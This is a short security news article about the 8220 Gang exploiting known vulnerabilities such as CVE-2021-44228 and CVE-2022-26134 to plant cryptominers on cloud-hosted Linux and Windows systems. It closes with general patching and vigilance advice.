28.Lock Globe

A recent increase in attacks has been observed from the 8220 Gang, a cybercriminal group from China. The group has become notorious for infiltrating cloud-based infrastructure and exploiting vulnerabilities to mine cryptocurrency from Linux and Windows users.

How Do These Attacks Work & How Can I Mitigate My Risk?

LinuxmalwareOne of the most significant concerns surrounding these attacks is the group's use of well-known vulnerabilities, such as CVE-2021-44228 and CVE-2022-26134, which poses a heightened risk to cloud security worldwide. The 8220 Gang identifies potential entry points through internet scans and exploits unpatched vulnerabilities to gain unauthorized access to cloud systems. This shift towards more sophisticated techniques is a critical evolution in cyber threats facing cloud infrastructure today.

The implications of these attacks are far-reaching, affecting countless organizations that rely on cloud infrastructure. The group's use of tools, including Tsunami malware, XMRIG cryptominer, masscan, and spirit, allows them to deploy cryptocurrency miners on compromised Linux and Windows hosts. This poses significant risks to the integrity and performance of the affected systems and will enable cybercriminals to profit from unauthorized mining operations.

Organizations must prioritize cloud security and adopt comprehensive strategies to protect against these advanced threats. This includes ensuring that all systems are regularly updated and patched, implementing robust security measures, and maintaining vigilance for any signs of compromise. As the 8220 Gang continues to evolve its strategies, the cybersecurity community must remain proactive in detecting and mitigating these threats.

This situation raises several questions regarding the responsibility of organizations to ensure their cloud infrastructure remains secure, particularly in the wake of new and more sophisticated techniques used by cybercriminals. Companies need to invest in cybersecurity and prioritize responses to emerging cyber threats. Furthermore, the 8220 Gang's recent campaigns highlight the need for further collaboration and information sharing between international cybersecurity experts to prevent such attacks from becoming widespread.

Our Final Thoughts on Combating This Increase in Attacks

The 8220 Gang's recent escalation in attacks on both Linux and Windows users is concerning. Organizations must ensure all systems are regularly updated and patched and adopt robust security measures to protect against advanced threats. The cybersecurity community must remain proactive in detecting and mitigating these threats. 

Be sure to subscribe to our newsletters to stay up-to-date on critical news, trends, and advisories impacting the security of your Linux systems.